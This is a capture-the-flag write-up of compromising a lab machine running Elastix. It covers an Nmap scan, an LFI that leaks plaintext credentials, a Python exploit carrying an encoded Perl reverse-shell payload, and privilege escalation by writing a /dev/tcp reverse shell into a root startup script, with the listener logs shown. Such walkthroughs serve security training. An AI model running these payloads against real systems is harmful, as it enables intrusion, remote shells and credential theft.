The first step, as with all machines is to run an Nmap scan to identify the running services.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) PIPELINING AUTH-RESP-CODE USER STLS UIDL APOP EXPIRE(NEVER) TOP
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: CONDSTORE CATENATE ACL CHILDREN OK URLAUTHA0001 X-NETSCAPE LITERAL+ LIST-SUBSCRIBED LISTEXT IDLE MULTIAPPEND MAILBOX-REFERRALS QUOTA NAMESPACE UIDPLUS Completed ID ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte THREAD=ORDEREDSUBJECT SORT SORT=MODSEQ IMAP4 RENAME UNSELECT NO BINARY IMAP4rev1 ATOMIC STARTTLS
443/tcp open ssl/https?
|_ssl-date: 2020-08-23T10:30:15+00:00; +2m01s from scanner time.
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/23%OT=22%CT=1%CU=43276%PV=Y%DS=2%DC=I%G=Y%TM=5F42455
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=D1%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 2m00s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 23 06:30:49 2020 -- 1 IP address (1 host up) scanned in 384.20 seconds
From here we can see there are numerous services running on the box. Most notable a SQL server, Mail server, and PBX. I started by browsing to port 80 and found that the Elastix server software was running. I attempted to log in with default credentials but this was unsuccessful.
I did some searching for exploits with Elastix. It’s difficult to tell from the login page which version of the software is running so much of this is trial and error. I found the LFI exploit HERE which allows you to view the amportal.conf configuration file. This file includes plain text credentials for the elastix web interface. It can be browsed to via the following link:
Inside this file you have the following block of text, which includes the login credentials to login to the Elastix web interface.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
vtigerCRM
adminL:jEhdIekWmdjE
Next I found THIS exploit which leverages the $to parameter in the callme_page.php page to provide remote code execution. By default, this code would not work due to certificate errors on the login page. It had to be modified slightly to rectify this, along with modifying the lhost and rhost values. I also had to reduce the minimum SSL version on my Kali machine by editing /etc/ssl/openssl.conf to accept TLSv1. I also needed to modify the extension number to match that on the Beep machine. This can be gathered by logging into the Elastix web interface, opening the PBX tab and finding the user name Fanis Papafanopoulos with the extension 233. The code for the exploit ultimately looked like the following:
1
2
3
4
5
6
7
8
9
10
11
import urllib
rhost="10.10.10.7"
lhost="10.10.14.29"
lport=443
extension="233"
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
I then started a netcat listener on port 443, ran the exploit and successfully received a shell on the listener. I upgraded the shell using python to something a bit more workable, then was able to browse to the fanis user and capture the user flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
kali@kali:/etc/ssl$ sudo nc -lvp 443
listening on [any] 443 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.7] 59571
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ whoami
whoami
asterisk
bash-3.2$ cd /home
cd /home
bash-3.2$ ls
ls
fanis spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
user.txt
bash-3.2$ cat user.txt
cat user.txt
[REDACTED]
bash-3.2$
Next we have to escalate privileges to root. I ran “ps aux” to find which programs were currently running. The following program caught my eye as it was running as a root user, however the file belonged to and had write permissions for the asterisk user. This allows me to modify the file, then have it run as root to spawn a root reverse shell.
1
root 3571 0.0 0.1 4636 1168 ? S 21:06 0:00 /bin/bash /etc/rc3.d/S91elastix-updaterd start
I started by modifying the file with the following reverse shell:
1
2
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.29/2600 0>&1
I then started a netcat listener on port 2600 on the kali machine:
1
2
kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...
I then needed to find a way of starting that elastix-updaterd process. After some trial and error I found that restarting the system through the elastix interface caused the elastix-updaterd script to run as the root user.
Once this reboot completed, I was presented with a shell on my netcat listener. From here i identified it was a root shell, and was then able to cat the root flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.7] 47950
bash: no job control in this shell
bash-3.2# whoami
root
bash-3.2# cd /root
bash-3.2# ls
anaconda-ks.cfg
elastix-pr-2.2-1.i386.rpm
install.log
install.log.syslog
postnochroot
root.txt
webmin-1.570-1.noarch.rpm
bash-3.2# cat root.txt
[REDACTED]
bash-3.2#